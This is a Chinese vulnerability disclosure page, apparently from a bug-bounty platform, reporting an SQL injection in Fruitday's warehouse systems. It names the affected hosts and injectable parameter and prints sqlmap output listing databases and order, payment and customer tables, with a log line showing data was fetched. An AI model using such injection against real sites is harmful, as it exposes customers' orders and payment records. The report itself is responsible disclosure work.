漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:天天果园通用注入一(600W+订单等信息全部泄露)
提交时间:2015-04-19 10:19
修复时间:2015-06-04 16:44
公开时间:2015-06-04 16:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-04-19: 细节已通知厂商并且等待厂商处理中 2015-04-20: 厂商已经确认,细节仅向厂商公开 2015-04-30: 细节向核心白帽子及相关领域专家公开 2015-05-10: 细节向普通白帽子公开 2015-05-20: 细节向实习白帽子公开 2015-06-04: 细节向公众公开
简要描述: ```
详细说明: 天天果园通用注入 涉及: http://wms.fday.co/ http://wms.fday.xyz/ http://wms.fruitday.com 如:http://wms.fday.co/order/pack/progress?batch_id=5970
web application technology: Nginx back-end DBMS: Microsoft SQL Server 2005 available databases [8]: [*] f [*] fruitday [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb
表:
material_RequestOrder fruit_OrderItemV2 fruit_orderPayment fruit_StoreRequestBillItem BagOpLog material_RequestOrderItem dtproperties PreSellRule CouponSales trade fruit_Store OnlineBankBill CardSales fruit_GroupOrderItem InputOrderJson fruit_BagItemSet fruit_OnlinePay DeliveryWave alipay_fruitday fruit_PkgType StateSyncQueue Payments bb fruit_PkgItem sysdiagrams fruit_StoreRequestPkg DeliveryOrderBak CouponInputs fruit_StoreRequstBill fruit_orderItemBak fruit_Activity cc fruit_BagPkg fruit_ExtraTaskItem test1 PaymentsTemp fruit_RefundRecord CancelQueue fruit_PayMethodReccordV1 DeliveryCar fruit_GroupOrder preOrderItem fruit_ActivityOrderItem fruit_Bag fruit_OrderPkg fruit_PayMethodReccord Gifts DeliveryOrder CCBack ReturnOrder fruit_Coupon Changes fruit_Customer fruit_GoldenCardBill fruit_CouponType aa fruit_ExtraWarehouse Staff TmalJson fruit_OrderV2 fruit_ExtraOrderType Department fruit_OrderSerial fruit_ExtraTask InvoiceRequest Enterprise OrderBak fruit_ComplaintItem fruit_CC InvoiceReccord fruit_Supplier fruit_Po fruit_BagItem fruit_OrderPayInfo fruit_SupplierProd fruit_PoItem OkCardBill ShouldTransferAccounts ReChargeInvoice fruit_PoInStockDetails UnionPayBillDetails fruit_SupplierPayment fruit_Stock fruit_UnPaidReccord preOrder fruit_DeliveryPerson fruit_User fruit_ProdType fruit_BagType fruit_Complaint fruit_Menu fruit_SubMenu fruit_UserMenu CouponRequest fruit_OrderOpRemark Product ProductItem CouponSalesReturn OnlineCoupon fruit_ProdSingleReturn
[00:20:48] [INFO] retrieved: fruitday [00:20:48] [DEBUG] performed 63 queries in 66.92 seconds current database: 'fruitday' [00:20:48] [INFO] fetched data logged to text files under 'G:\SqlmapV4\wms.fday.co' ok
漏洞证明: 修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:20
确认时间:2015-04-20 16:42
厂商回复: 非常感谢您提供的漏洞,我们会尽快修复!
最新状态: 暂无
漏洞评价:
评论